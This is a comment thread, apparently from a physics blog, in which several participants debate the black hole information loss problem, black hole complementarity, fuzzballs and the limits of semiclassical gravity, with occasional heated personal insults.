simultaneously measured in the Hawking radiation, if you believe in standard quantum mechanics. 
What you are demanding is that this semi-classical expansion break down at leading order even though direct computation shows it to be well-behaved. This is a logical possibility, but it's a dramatic breakdown of an expansion in a regime where general principles say it should be valid, and I don't know any analog of such a thing elsewhere in physics, so more "details" are needed, to put it mildly. regarding your above comment with the infalling and outside observer, you write "we know how to calculate the deviations from that picture, but to be sensitive to those we need to go beyond semi-classical gravity." Could you be more explicit on what you mean with "go beyond semi-clasical gravity"? Best, Peter Shor: I already answered that question. When you are careful to use only well-defined questions, you can see that the two perspectives on what happens to the infalling observer can be simultaneously correct, just as two descriptions of the same process, without any dramatic failure of perturbation theory in regimes where it is supposed to be valid. I also think this is the only way you can keep what we know to be correct in GR, in the appropriate regime of validity, and keep QM unitarity intact. I think the main barrier to come to terms with this picture is attributing the spacetime metric more reality than it deserved, therefore assuming that questions like "where" various things happen have absolute observer-independent answers. The main point is that the geometrical perspective summarizes the observations using low energy probes (which don't have too much resolution). Since those probes are different for the two observers, related by (classically) infinite boost, they will describe the process using effective metrics which are different from each other. I may be wrong in all that, but I appreciate if you tell me how. Where precisely in the picture I drew above do I get a failure of PT in regimes it is supposed to be valid? Dear Bee, I don't see how anything I advocate can possibly be summarized by option 3). 3) is described by a particular causal diagram, a causal diagram only makes sense when there is a nearly smooth geometry, and in any description where there is a smooth geometry in the framework I advocate, the spacetime looks so that the causal diagram is drawn as 1). Whether one says that the information is killed, undergoes euthanasia, or reincarnates into another Universe near (or at) the singularity is a matter of untestable philosophy (or religion). What is important for physics is whether the information can get out where we decide whether the information was lost: to scri plus. And it is the causal rules plus the existence of the horizon that imply, in the semiclassical picture, that the information can't get there. The philosophy around the singularity has nothing to do with these physical questions. It's interesting that you're among the people who like to say that proper high-energy physics - string theory - has become a philosophy, but when it comes to a particular example, you advocate religious questions instead of a proper rational analysis of measurable issues. Dear Peter, the non-perturbative contributions to 1/N perturbative expansions don't go like exp(-1/N) but rather exp(-CN) or exp(-CN^2). Think twice. Otherwise, sure, the "probability that one can extract the information" is not behaving continuously in the limit. It is "0" in the 1/N expansion but "1" in the accurate treatment. There is nothing inconsistent about it. It's an order-of-limits issue. 
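A schematic way to see the scaling at stake in this exchange (a standard textbook estimate, stated loosely, not a quote from either commenter): if the small parameter of an asymptotic expansion is ε, the effects missed by the expansion are typically of order exp(-C/ε), so

e^{-C/\varepsilon}: \qquad \varepsilon = \hbar \;\Rightarrow\; e^{-C/\hbar} \ (\text{tunneling}), \qquad \varepsilon = 1/N \;\Rightarrow\; e^{-CN}, \qquad \varepsilon = 1/N^2 \;\Rightarrow\; e^{-CN^2},

which is why the corrections to the semiclassical (1/N) expansion are written above as exp(-CN) or exp(-CN^2) rather than exp(-1/N).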
The resolution needed to get the information out becomes extremely fine as N goes to infinity and the black hole is kept large. If you ask whether you can get the information out with a fixed resolution, in Planck units, the probability would be a continuous function of N. You can't "practically" get it out from large black holes, neither for finite N nor for infinite N. The discontinuities of the type you are bothered by are completely common in physics. For example, the microscopic description of N atoms is time-reversal symmetric for any N, but the thermodynamic, large N limit - a phenomenological theory of matter - is time-irreversible and contains terms like friction (which is calculable from the microscopic laws, at least in principle). It is completely analogous to the black hole case. The analogy is "large N" = "large N"; "preserved information" = "time-reversal symmetry". Let me elaborate upon the analogy a little bit because this debate looks nearly isomorphic to some debates with Sean Carroll who was saying similar bizarre things in the case of thermodynamics. For finite N, the number of atoms, we have a time-reversal symmetric theory. It preserves the information, too. It is reversible. I think that in this case, it's the side that Sean Carroll is getting and it is analogous to the description in terms of black hole microstates or fuzzballs. However, there exists an extremely important large N limit of the theory describing N iron atoms. It is the macroscopic theory of pieces of iron described by partial differential equations for an iron continuum. This theory knows about the density of iron, various types of torsion, stresses, and friction. Many of the terms in these equations violate the time reversibility, having first time-derivatives in them. Also, things are slowing down by friction. These are completely analogous processes to those in GR where a black hole emits waves and, following the ringing mode patterns, approaches the static (e.g. perfectly spherical) shape. Now, for finite N, the information is preserved and the evolution is reversible. But the strict infinite N limit is a "new emergent theory" that knows nothing about the individual atoms or pieces of fuzzballs. And this theory is not time-reversible, and kills information (classically, it shrinks the volume of phase space during the frictionful evolution, even in the iron case). Now, Sean Carroll doesn't understand how physics can possibly predict that the entropy increases and doesn't decrease instead, even though the laws should be T-symmetric. That's his problem because it's important that the entropy does increase and not decrease and every theory that would say otherwise is ruled out by basic observations. Of course, we also know theoretically why the entropy increases. Any coarse-graining increases the volume of the envelope of some states in the phase space. The initial states are "well-defined" regions of the phase space, because we always study well-defined initial conditions, while the future state is always determined from the initial one by the evolution laws, so it is "chaotic" and has higher entropy. It's interesting to notice how this influences the jump from the micro to the macro description. Carroll doesn't see how the friction could ever be derived from a microscopic theory. But it can be derived in a very transparent way, following variations of Boltzmann's H-theorem. How does one see that the final state is "chaotic"? 
Well, one may assume "molecular chaos" - random velocities in the initial state. This is completely analogous to the averaging over the black hole microstates. When one does so, he ends up with time-irreversible effective equations - either GR with horizons and information loss; or with a theory of matter continuum with friction and viscosity and dissipation. Molecular chaos may be controversial because there's no "preferred" random distribution at the beginning. But the details of the initial distribution really don't matter for the growth of the iron entropy, horizon area, horizon itself, or irreversibility: the only condition is that we must avoid infinitely unlikely and contrived choices of the initial state that would evolve into a low-entropy final state. It's not that hard to miss the special "adjusted" initial states. So once we average over some initial microstates (of fuzzballs; or the velocities of iron atoms), we inevitably end up with the effective description, in the large N limit, that is irreversible, dissipates, generates entropy, and so on. Dear Peter, the non-perturbative contributions to 1/N perturbative expansions don't go like exp(-1/N) but rather exp(-CN) or exp(-CN^2). Think twice. Touche. But the rest of your response is just wrong. Think about it. It's just like the decay of an unstable state in QM via tunneling. This vanishes to all orders in hbar, but tunneling gives a contribution exp(-c/hbar). This is a very small effect, and so the perturbative result that the state is approximately stable is almost correct. In perturbation theory the proton is stable, and so that must be approximately true, and indeed decays due to nonperturbative effects give it a very long lifetime. In your example, at large N the system will exhibit time irreversibility to an excellent approximation (this is how our world looks after all). I'm stating the obvious: perturbation theory is very accurate when the expansion parameter is small, and corrections to perturbation theory are then exponentially small. So if perturbative semi-classical gravity says with probability one that an observer falls through the horizon in a smooth way, then this must be very close to the truth. The potential loopholes, which is what Moshe is getting at, are quite different from what you are claiming. I don't see how anything I advocate can possibly be summarized by option 3). Let me explain: Option 3) depicts an asymptotically semi-classical spacetime without a future event horizon and without a quantum singularity, for definitions see paper. Correct me if I am wrong, but I think this has been the case you have been talking about. As far as I know, fuzzballs have neither an event horizon nor a singularity. The diagram you insist is the correct one however clearly does have both an event horizon and a singularity. Maybe you should make up your mind. 3) is described by a particular causal diagram, a causal diagram only makes sense when there is a nearly smooth geometry, and in any description where there is a smooth geometry in the framework I advocate, the spacetime looks so that the causal diagram is drawn as 1). The geometry is smooth in the asymptotic limit. It might not be smooth in a region where quantum effects are non-negligible, there one shouldn't trust the diagram. That is the region shaded in grey. It might not even make sense to speak of locality in this region. That however doesn't change the fact that this region is embedded in the asymptotically classical space-time. 
It does not have a clear boundary (as effects don't suddenly turn on, but become gradually more important), but it certainly can be contained within a well defined classical region. It's interesting that you're among the people who like to say that proper high-energy physics - string theory - has become a philosophy, It is quite pathetic how you continue to invent things I never said. In case that is what you are referring to, I have on an earlier occasion asked the readers of this blog whether Physics will turn into Philosophy. Not only are you replacing Physics with String Theory, you also seem to have problems figuring out what the difference is between a question and a statement. (Now that I think about it, this is also evident in this comment section. Did it ever occur to you I ask questions not because I'm just stupid, but because I want to make sure we are talking about the same thing before we run into a misunderstanding?) you advocate religious questions instead of a proper rational analysis of measurable issues. Peter: "In your example, at large N the system will exhibit time irreversibilty to an excellent approximation (this is how our world looks after all)." In both examples (iron and black hole), irreversibility (and information loss) holds to an excellent approximation for large N. In other words, whenever one chooses a resolution of probes and accuracy that is less than perfect, information is getting lost and the evolution is irreversible. There is no qualitative difference between the two cases. The black hole example is not just analogous to the thermodynamic discussion: it is really a special case of it. I don't believe that Moshe disagrees with it because that would mean that he misunderstands basic thermodynamics, much like you do, and I see absolutely no reason to consider this hypothesis. Bee: I insist on every letter I wrote and you just help to confirm my point. Neither of your ideas about the black holes has anything whatsoever to do with the black holes in the real world, or any world that at least remotely resembles the real world, unlike black holes from Maldacena's papers that are always in the same universality class, to one extent or another. Lubos: I will try one last time to help you before I give up. Everyone agrees that a priori it is possible that the black hole information can come out in the radiation via small correlations that vanish in the infinite N limit. That by itself is fine, but the paradox is how to reconcile this with statements about an infalling observer carrying in information. Order by order in the 1/N expansion you will find that the observer travels in nicely, retaining his information. For very large but finite N this should then be true to excellent approximation. But if you believe in the usual rules of quantum mechanics the information cannot simultaneously be in the emitted radiation. The potential loophole here is that perhaps there is some subtle way in which this information really can be in "two places at once". That's called black hole complementarity, and is what Moshe is advocating. I really can't make it any simpler than that without the use of hand puppets. Peter, do you agree then that complementarity does not require you to modify known physics in regimes it should apply? I think that point is crucial to me, because like you I'd be suspicious of any proposal that suggests otherwise. Moshe: we'll have to first agree on what we mean by "in regimes it should apply". 
One might want to say that semi-classical results should hold whenever the curvature is low and one is asking sufficiently low energy question. But then one concludes that the infalling observer carries in information, and then the no xerox principle says it can't also be in the emitted radiation. Here I just assume that any information in the emitted radiation is in principle accessible to an external observer making low energy measurements, albeit with fantastic precision. Alternatively, one might argue that the above is too strong a requirement, since the observeability of the information duplication relies on some superobserver who can simultaneously see inside and outside the horizon. So maybe one should only trust physics in regimes that can be tested without reference to such a superobserver. I would personally say that this by itself constitutes a modification of known physics, but perhaps this is just semantics. In the above I am of course just summarizing the debates that went on regarding black hole complementarity in the early 90s. Great, I think we understand each other perfectly, we are down to semantics and personal belief. For me, references to unobservable quantities always raise a red flag, especially if there is an explicit confusion already on the table. I don't think this is the only context in physics for which such quantities (like that super-observer) get you very confused. So, my inclination is to regard that kind of mental discipline as nothing unconventional, just some good thinking habits, but that is just a matter of personal taste. Good, then I'm basically happy too. The true version of quantum mechanics/gravity may be such that it allows for information duplication as long as no one can actually observe this happening. I would just like to see this statement derived rather than asserted, as it is a bit vague to use as an axiom. And I'd like to know what are the precise conditions under which this information duplication can occur. Agreed, qualitative scenarios are nice but calculations speak louder. Now that we have a microscopic description of a situation containing quantum black holes, we can start putting meat on this particular scenario. I'd say this is getting more and more plausible, but we are still pretty far off from claiming it is an inevitable fact of life. In particular the viewpoint of the external observer is natural in ads/cft, but the infalling observer is more mysterious. (one minor point about the semantics, when two observers use different words to describe their partial knowledge of a single quantum state, duplication may be a misleading word to use). I'd like to thank "Peter" and Moshe for their extremely helpful exchange, which has made me realise that black hole complementarity is far from being as silly as the fuzzball stuff made me think. Moshe: you say about Horowitz-Maldacena: "Pope, I don't understand the M-H paper very well, maybe I'll invest some time trying to do that. It may well be the way things work for an in-falling observer. I am also not sure it necessarily contradict the complementarity picture." Yes, I see what you mean, and in fact H+M express a hope that something like this might come out of their work, though I don't understand exactly what they say about this [towards the end of the paper]. That would be wonderful if it could be done. I do hope that you will eventually have a posting about H+M on your blog... 
Peter Shor: Yes, the question as to the direction of time inside the black hole is crucial in H+M, but they explicitly deny that this will happen in their scenario; they devote a section of the paper to this very question. I think I will not try to paraphrase them... you might find this helpful: http://dabacon.org/pontiff/?p=1207 Lubos M: Your errors in this discussion apparently stem from your misunderstandings re the foundations of statistical mechanics. I suggest that you consult Peter, unlike Moshe, I don't see any partially rational reason that could be behind your extremely slow pace of understanding these simple things. Peter: "Order by order in the 1/N expansion you will find that the observer travels in nicely, retaining his information." Well, order by order in the 1/N (or "a", the atomic radius) expansion of the mechanics of 1 meter of iron, you will see that friction is slowing down its motion nicely, retaining the information about the initial state in exponentially decreasing degrees of freedom such as the relative velocity of two pieces of iron. Until the observer hits the singularity - or the friction stops the iron completely. There is absolutely no difference here. I deliberately constructed the examples to be isomorphic so only a mad person could oppose them. It is disappointing but not shocking that you oppose them anyway. Peter: "For very large but finite N this should then be true to excellent approximation. But if you believe in the usual rules of quantum mechanics the information cannot simultaneously be in the emitted radiation." This statement is equivalent to the statement that "quantum mechanics is incompatible with complementarity". Clearly, the statement is wrong. The degrees of freedom inside are explicitly functions of the degrees of freedom that one may imagine to be in the Hawking radiation only. For the iron case, there's still a perfect analogy. Two pieces of iron are crawling on top of one another. The relative velocity of these two places is like the quantities seen by the infalling observer - something that only makes sense in the thermodynamic limit. You could also say that it is a quantum xerox machine to say that these relative macroscopic velocities evolve deterministically, yet they are independently imprinted in the atomic description. And you would be equally wrong. There's no doubling of information here. The macroscopic velocities are simply some special functions of the atomic velocities. There is no double counting here. The only reason why the Hawking radiation could be banned from carrying the information is causality, but causality is only emergent in the strict infinite N case, i.e. in the 1/N expansions, but there's no exact causality in the exact finite N treatment. I am sorry that this discipline of science may be too difficult for girls who play with puppets, but maybe boys who play with trucks could already get it. Complementarity is fully compatible with the picture of difficult microstates - they're parts of the same framework. To decode the fuzzball inside the black hole, one must exactly know how it's connected to the exterior world near the horizon, i.e. one must know fine microscopic details about the Hawking radiation. For the rest of the nasty "Pope" crackpots here. I haven't made any error anywhere in this discussion, unlike the gadzillion of errors made (and still being made) by the likes of Peter. Lubos: you seem to be very interested in iron. That's nice. But we're actually discussing a different topic here. 
Moshe: It would be good if there were an actual concrete computation one could imagine doing to check the complementarity idea. In one way or another, you need to have two operators (one describing an observer and one measuring radiation) fail to commute even though they are spacelike separated by an arbitrarily large amount and live in a region of arbitrarily low curvature. Furthermore, the amount of non-commutingness has to be of order 1, even though it is zero order by order in the semi-classical expansion. Finally, this should only happen when one of the operators is inside an event horizon, or there is some other reason why no single observer can compare results of measurements made by these operators. Statements like "spacelike separated" undoubtedly become a bit fuzzy at the non-perturbative level, but the hard part is imagining that they get fuzzy enough when the curvature is arbitrarily low. I can at least imagine how one would try to check something like this in AdS/CFT. But with current understanding the situation is effectively reversed, as it's very hard in this context to derive the ordinary causal structure and ordinary notions of locality. Otherwise, as far as I know there is no direct evidence of this prediction of complementarity. The arguments in favor of complementarity are that it seems to be necessary if you demand that the info comes out in the radiation, and also that it doesn't lead to any obvious contradictions with the usual account of what an actual observer would measure. Peter, I agree with everything you write (also, thanks for the nice discussion, it helped me clarify my thoughts). In particular the best evidence for complementarity is indeed the fact that it minimally incorporates all of known physics in regimes it applies (shall I call such an approach conservative?). Something more concrete would be desirable, but we'd need to understand spacetime locality first. I have a feeling we are not that far off, because this time around we have a concrete model to discuss those things. We can calculate things and gather evidence, instead of arguing which proposal is more reasonable. (incidentally, I seem to have mixed my Peters once or twice above, sorry.) One minor point, about the commutator of the two operators: in semi-classical gravity all the questions you can ask give you a ridiculously low amount of information (order one). So, the operators we have to discuss don't have a good semi-classical limit, and therefore you cannot say their commutator is zero in that limit. The fact that either observer is so incredibly oblivious to the real nature of what is going on in the system makes the idea of complementarity more plausible, I think. So, the operators we have to discuss don't have a good semi-classical limit, and therefore you cannot say their commutator is zero in that limit. You lost me there. Assuming the outgoing radiation does carry the information, this should be measurable by an external observer making low energy measurements (albeit very precisely). So there should be a semi-classical operator that describes this. Are you saying that you need to know quantum gravity in order to measure these subtle correlations (I would say that you need QG to compute what these correlations are, but not to measure them once they are there)? I still don't understand how locality is violated in the fuzzball description. Seeing as how we must violate it at least weakly in order to avoid Hawking's argument and retain the nice picture of holography. 
Peter, in the semi-classical limit you are only able to gather order one number of bits. Trying to gather order S number of bits, any way you'd like it, you'd need more than the semi-classical treatment. I was assuming you are going to probe the system with very complicated operators to gather the required information. Alternatively you can also try to measure simple operators, but incredibly accurately. For getting this level of accuracy you'd need the small corrections provided by the full quantum gravity theory. Either way, if you probe the system using only semi-classical gravity, you get a very coarse grained picture. This is an important fact in this whole story. Peter, in the semi-classical limit you are only able to gather order one number of bits. Trying to gather order S number of bits, any way you'd like it, you'd need more than the semi-classical treatment. I don't see that. If you put a black hole in a box it will evaporate away into a gas of approximately thermal radiation whose entropy is of order the black hole entropy. Using semi-classical tools I can "easily" distinguish between essentially all the microstates of such a gas without needing to know about quantum gravity. Peter: presumably you'd measure some quantity, then calculate this quantity in semi-classical gravity for different states and use your measurement to distinguish the states. I'm saying that with any finite accuracy of measurement, and using only the semi-classical approximation for calculating properties of states, you will not be able to gather the required information to completely distinguish two generic states. For example, generically all states with the same quantum numbers are non-degenerate. So, accurate measurement of the energy at infinity ought to distinguish them. However, the energy spacing is of order e^(-S), so in the semi-classical limit any energy measurement with finite resolution will get contribution from huge number of states. completing the thought: even if you relax the requirement of finite energy resolution, and contemplate measuring energy to incredible accuracy, you'd still have to calculate the energy of states to that incredible accuracy in order to distinguish them. You cannot do that without the complete theory of QG. Moshe: I agree that measuring the precise energy is very hard. E.g. the level spacing for a 4D Schwarzschild BH goes as M e^{-M^2}, which is tiny. But also for gas in a box, while you could try to determine the microstate by carefully measuring the energy, this would be incredibly hard, but there are other far easier ways to do it. I'm arguing that if you could actually perform the experiment of collapsing matter into a black hole and letting it evaporate into a diffuse gas of radiation, a semi-classical observer could (by repeating the experiment enough times) thereby measure the S-matrix for this process. The hard part would be computing this S-matrix from first principles, but I don't see the obstacle to measuring it. Peter: I see the distinction you are making. I am talking about the calculation, not the actual measurement (though there could be interesting issues there as well, especially for the infalling observer that has finite lifetime). The description either observer gives to the system, using semi-classical GR variables, is a highly coarse grained one, that was my point. If both observers were describing the system in a language that was sensitive to all its fine structure, something like complementarity would be much harder to swallow. 
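For orientation, the numbers quoted just above come from the Bekenstein-Hawking entropy; schematically, for a 4D Schwarzschild black hole in Planck units (G = c = hbar = 1),

S_{BH} = \frac{A}{4} = 4\pi M^2, \qquad T_H = \frac{1}{8\pi M}, \qquad \Delta E \sim T_H\, e^{-S_{BH}} \sim \frac{1}{M}\, e^{-4\pi M^2},

so the level spacing is exponentially small in the entropy, i.e. in M^2; the precise prefactor (M versus 1/M) is beside the point being made in the exchange.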
I wonder what's the problem with information and black holes? Information is related to entropy, and entropy certainly isn't a constant of motion of a system thermodynamically or quantum mechanically, only classical mechanically, in Newtonian mechanics, which is the 'trivial' limit of quantum mechanics, clearly the more realistic world. So why that 'paradox'? Best, A. dS/dt >= 0, and so time reversibility of individual particles doesn't mean anything for a system of particles (an isolated system, say). Can you explain how it is possible that classically information is lost, or are you saying that actually the above form of the 2nd law is wrong, and it should be dS/dt = 0? I think I have stated the problem as I see it multiple times in this thread and in the previous one on the information loss problem. It's that the evolution is not unitary, which clashes with our understanding of quantum mechanics. All that talk about entropy doesn't get you anywhere if you don't know for certain what the entropy of the object or its radiation is. Best, And so classically entropy increases, precisely because you include measurement in your model, and "if you wait long enough" you will only lose information, not gain it "from the sun", because of repetitive measurement. Same with black holes. A. Haha, dear Stefan, it's funny you are trying to fish for something to turn the discussion personal. And avoiding SCIENCE issues. I believe I made my SCIENTIFIC point very clearly, and any decoy you are trying to pull is very, how should I say... unprofessional. I rest my case. Very best, A. PS: although I find it very admirable that you try to defend your spouse even when she is obviously wrong, I believe it is more helpful to set someone straight than to support the wrong opinions of others. Gosh, I turn my back on this blog for 1 hour to run into a pharmacy and you guys get in a fight over nothing. First, A., I don't know which 'case' you think you have made, but it is none. I'm talking CLASSICALLY, the only way ENTROPY is defined. I hope you know CLASSICALLY what entropy is, do you? It might have escaped your attention but CLASSICALLY there is no information loss problem, case rested. Besides this, Googling would have been sufficient to find that entropy can also be defined in quantum mechanics. It has the property that it remains invariant under unitary transformations, meaning in particular pure states evolve into pure states. To reiterate what I said above, the problem is that the evolution of black holes is seemingly not unitary (without measurement), in conflict with quantum mechanics as we know and like it. Besides this, I think you suffer from a confusion about the case with dS>0. It does not mean the time-reversed evolution of a state with increased entropy does not exist, it means this time-reversed evolution is extremely unlikely to happen. I think this should explain my example with the sun. Whether getting that information is in practice feasible is a different issue. However, as I have also said several times above, you might not be bothered that after measurement evolution is indeed non-unitary, but you should be bothered if prior to measurement it is, because it has unwanted side effects, such as violation of energy conservation that can in principle be arbitrarily large. As I said, you can try to play around with accepting some form of non-unitarity that might keep these side-effects small, there are people who are taking this path. 
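To pin down the quantum-mechanical notion of entropy invoked a few sentences above (the standard textbook definition, not any commenter's formula): the von Neumann entropy is indeed unchanged under unitary evolution,

S(\rho) = -\mathrm{Tr}\,(\rho \ln \rho), \qquad S(U \rho U^\dagger) = S(\rho),

so a pure state (S = 0) stays pure as long as the evolution is unitary; that is exactly why a pure-to-thermal evolution, taken literally, cannot be unitary.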
As to Stefan's comment, his and my exasperation with comments like yours is that they are completely unconstructive and merely show that you have neither tried to follow the line of thought in my writing nor my previous explanations in earlier comments. It is thus merely a waste of our time. I hope you understand that. Rest assured, it's nothing personal. Take an arbitrary initial quantum state with total mass M. Let it collapse to a black hole. Let it evaporate. If Hawking's calculation holds, the emitted radiation depends solely on the mass (angular momentum, charge) of the collapsed matter. If it evaporates that way completely, the endstate is always the same for all initial states with the same mass. Thus, starting from the endstate you cannot reconstruct the initial state. Evolution is not reversible, meaning it can't be unitary. (This is written in various forms in this post, in the earlier post, and in the paper.) You can then allow for deviations from the semi-classical limit in the Planckian regime, it follows the usual argument, see paper. Best, Sorry, comments crossed. In the case of throwing something into the sun, you can 'in principle' reconstruct the initial from the final state before reduction through measurement (in which case you have the usual problem that this process is non-deterministic). Best, “So if Hawking's calculation holds we have a problem, and if it doesn't, we don't have a problem.” Sorry for interjecting, yet there is another possibility, although considered by most to be remote, and that is to consider that neither black hole singularities nor event horizons exist to begin with. That is, GR is not quite right. Recently I finished reading John Moffat’s book “Reinventing Gravity”, where he submits that his latest Modified Gravity Theory (MOG) predicts this. In this theory massive stars and super massive bodies at the centre of galaxies would form a final compact state he calls grey stars, where light (EM) is so bent that it has a hard time escaping, although a lesser amount does. Unfortunately he doesn’t say how much greater in diameter it would be above the Schwarzschild radius, yet I know that the photon sphere of a non-rotating black hole extends to 1.5 times that distance. For rotating ones there are two. I suspect then the calculated minimum radius is somewhere between the two. So there is some possibility that, while Hawking’s calculations are correct, the model he uses for gravity could be simply wrong. This is not to say that I understand Moffat’s theory to be true; yet he has given ways it can be tested and thus falsified, which seems more difficult using the more normal considerations. So if Hawking's calculation holds we have a problem, and if it doesn't, we don't have a problem. Do you think this problem is big enough to vote against Hawking's calculation? That's not the point. The point is to understand exactly why and where it fails and to get the correct answer. Bee: listen, Hawking's equations are semiclassical, meaning they very much include MEASUREMENT in them. Meaning no problem there. You can't have your argument for quantum unitarity be based on a semiclassical calculation, got it? [...] My point then is that every semiclassical model includes measurement in it, meaning irreversibility is expected and it would be strange if there were no time-irreversibility. What is classical is the background field, and it is so to an excellent approximation, the more massive the black hole, the better. What one computes is the propagation of a quantum field in this background. 
Its propagation should be reversible unless you perform a measurement on it, which you don't have to. If this is too complicated, think of it in terms of a scattering matrix, which I find more intuitive. You have an almost flat space in the beginning with some quantum states. They approach each other (form a black hole and evaporate) and you have outgoing quantum states. What are the transition amplitudes? Is this evolution unitary? Besides this, let me repeat that the non-unitarity you generically get if you accept what you advocate can have unwanted side effects such as violations of energy conservation. Be careful what you wish for. You could easily clarify your confusion if you'd look up any of the literature on the subject. Well, I didn't read the book, but let me say that as much as I like John it doesn't make sense to me. See (as I said several times in this post and in earlier posts) a black hole horizon can form at arbitrarily small background curvature. GR is an extremely well tested theory in the weak curvature regime. If you want to generally avoid black hole formation you need to have significant modifications of the theory in regimes that we have tested well. I don't know how John envisions a solution to this, but I am pretty sure you'll have to bend your mind around quite a bit for this. Sorry for being so 'conservative' ;-p Maybe you could clarify your confusion if you think about what you read. I don't advocate nonunitarity, what I'm saying is that Hawking's calculations are practically classical, meaning unitarity or nonunitarity is not an issue, since that term belongs to the quantum domain. The background field is classical, meaning it includes measurement, meaning you can't say it is so "to an excellent approximation". It is or it isn't. Measurement disrupts everything, in a rather DISCONTINUOUS way. And so it is not "to an excellent approximation", but to a catastrophic approximation. As I have said above, the point is not to draw a picture with crayons, but to come up with a calculation that shows exactly when and where Hawking's calculation goes wrong and what the correct result is. Your argument is fundamentally flawed, you could equally well say that no process in our labs is ever unitary, because hey, we treat the background as classical. Yet, treating the background as classical is indeed, as I said, an excellent approximation - as long as quantum fluctuations of the background are negligible. Best, I understand what you are saying, but you don't understand my answer. I am very sympathetic to the idea that the gravitational field carries degrees of freedom that are relevant to the propagation and survival of information, but stating that alone doesn't solve the problem. To show that it does, you'll need to know how the quantum degrees of freedom are encoded in the quantum background, and that all the information from the initial quantum field (including the matter field) is contained also in the final state. You need to do that without causing strong deviations from the theories that we know and like, which work perfectly well if the background is to a good approximation classical - which is the essential ingredient to Hawking's result. You can put some quantum hair on the horizon if you like; as far as I know these attempts didn't go very far. If you claim that quantum effects of gravity are non-negligible, and relevant for the outgoing radiation, let me ask you once again: how so. 
And if you have solved the problem, why don't you go and publish a paper about it instead of wasting my time with your crayon drawings? Best,
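To put the point the last several exchanges circle around in symbols (a paraphrase of the standard statement, not any commenter's exact formula): Hawking's semiclassical calculation sends every initial pure state of given mass, charge and angular momentum to (approximately) the same thermal density matrix,

|\psi_{\rm in}\rangle\langle\psi_{\rm in}| \;\longrightarrow\; \rho_{\rm out} \approx \rho_{\rm thermal}(M, Q, J),

whereas unitary evolution would require \rho_{\rm out} = S\,|\psi_{\rm in}\rangle\langle\psi_{\rm in}|\,S^\dagger, a pure state that still depends on |\psi_{\rm in}\rangle. A many-to-one, pure-to-mixed map cannot be written that way, and that incompatibility is the information loss problem being argued about here.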
null
minipile
NaturalLanguage
mit
null
Lebanon’s prime minister announced his resignation Tuesday following nationwide protests that have paralyzed the country for nearly two weeks. In a televised announcement, PM Saad Hariri stated that he was stepping down amid his country’s anti-government demonstrations, relinquishing political power to Lebanon President Michel Aoun. LEBANON PARALYZED BY NATIONWIDE PROTESTS OVER PROPOSED TAXES “It has become necessary for us to make a great shock to fix the crisis,” Hariri said. “Our responsibility today is how we protect Lebanon and revive its economy.” The move comes only hours after a mob of supporters from the Hezbollah party attacked anti-government protest camps in the country’s capital of Beirut. THOUSANDS OF LEBANON DEMONSTRATORS KEEP PRESSURE ON GOVERNMENT What began on Oct. 17 as a fight over a tax on Whatsapp calls has now erupted into “a war scene,” according to a local TV presenter. The predominately non-violent demonstrations were disrupted by the Shia-Islamist group who are upset that their country is being paralyzed politically and economically. Soldiers and riot police have been trying to separate the two groups using non-deadly force, but have been unsuccessful. Hezbollah leader, Sayyed Hassan Nasrallah, stated Friday that the roads around Beirut's center should be reopened and hinted that the protestors were being funded by foreign enemies attempting to infiltrate their agendas. “Someone is trying to pull it… toward a civil war,” Nasrallah said Friday about the country’s uprisings. Hezbollah, the country’s most powerful armed group, backs a majority of the Lebanese government since its formation following the 1975-1990 civil war. They are represented by Parliament Speaker and Shia Muslim Nabih Berri, who traditionally splits up political leadership equally with a prime minister representing Sunni Muslims and a president representing Maronite Christians. Berri has been called to resign over his involvement in an ineffective government and economic system. “We just want to say that this is the first of many,” a protester told The Guardian after Hariri’s resignation. “We’re waiting for the others to show some dignity. But I doubt they have it.” With the banks closed for the tenth day in a row, many political operatives argue that the protesting is only hurting their cause. CLICK HERE FOR THE FOX NEWS APP “Even if the protesters leave the streets, the real problem facing them is what they are going to do with the devaluation of the pound,” a Lebanese economist, Toufic Gaspard, told Reuters. The Associated Press contributed to this report.
null
minipile
NaturalLanguage
mit
null
According to the report, the company is researching ways in which DNA can arrange itself into patterns on the surface of a chip, and then act as a kind of scaffolding onto which millions of tiny carbon nanotubes and nanoparticles are deposited. That network of nanotubes and nanoparticles could act as the wires and transistors on future computer chips. Amazing, isn't it? If your futuristic phone's chip could be made up of DNA, your mobile phone as well might be made up of your own DNA. Furthermore, that will become your unique identity number and you might even have the phone embedded in your body.
null
minipile
NaturalLanguage
mit
null
maple syrup Pick up some Maple Syrup and Carrots at the market and you’ve got a crowd pleasing side dish for your Thanksgiving Day table and beyond. For more great farmers market inspired recipes visit: LocalSavour.com
null
minipile
NaturalLanguage
mit
null
Libs-Nats have ‘cut and shut’ regional rail LETTER TO THE EDITOR: Minister: It's hard to trust the Liberals and Nationals rail announcement, going by the history books. LETTER TO THE EDITOR: IT’S hard to trust the Liberals and Nationals rail announcement, going by the history books. They have no credibility when it comes to regional rail. All they’ve done is cut and shut. When last in government they didn’t order a single new carriage for two years, didn’t start a rail project anywhere and ripped $120 million out of V/Line — and it was a Liberal-National government that shut regional rail lines. We’ve stopped the cuts, restored the funding to V/Line, ordered 87 new regional carriages and already begun the design work needed to run VLocity carriages on long haul lines. We’ve added 600 services to the regional network and additional VLocity carriages to services that need them most. These carriages, built in Victoria, reduce crowding on the busiest services and allow more trains to run more often, and we’ve invested in the design work necessary to replace the classic fleet with modern trains. If the Coalition wants to do something useful for V/Line users, it should pick up the phone to Malcolm Turnbull and tell him to release the money he has promised for Regional Rail Revival so we can get on with upgrading every regional line, and run modern trains across the state.
null
minipile
NaturalLanguage
mit
null
Today we received the first official poster for “Star Trek Into Darkness,” the sequel to the remake of “Star Trek” from director J.J. Abrams. From what we can see, there is a human figure on top of stone rubble, from a collapsed building or a derelict spaceship, in a city. The official plot of “Star Trek Into Darkness” is the following: In Summer 2013, pioneering director J.J. Abrams will deliver an explosive action thriller that takes Star Trek Into Darkness. When the crew of the Enterprise is called back home, they find an unstoppable force of terror from within their own organization has detonated the fleet and everything it stands for, leaving our world in a state of crisis. With a personal score to settle, Captain Kirk leads a manhunt to a war-zone world to capture a one man weapon of mass destruction. As our heroes are propelled into an epic chess game of life and death, love will be challenged, friendships will be torn apart, and sacrifices must be made for the only family Kirk has left: his crew. The premiere of the first trailer is scheduled for this December, and it is said to be shown preceding screenings of “The Hobbit: An Unexpected Journey”. “Star Trek Into Darkness” will be released on May 17, 2013 in the United States and will star John Cho, Bruce Greenwood, Simon Pegg, Chris Pine, Zachary Quinto, Zoe Saldana, Karl Urban, Anton Yelchin, Benedict Cumberbatch, Alice Eve and Peter Weller.
null
minipile
NaturalLanguage
mit
null
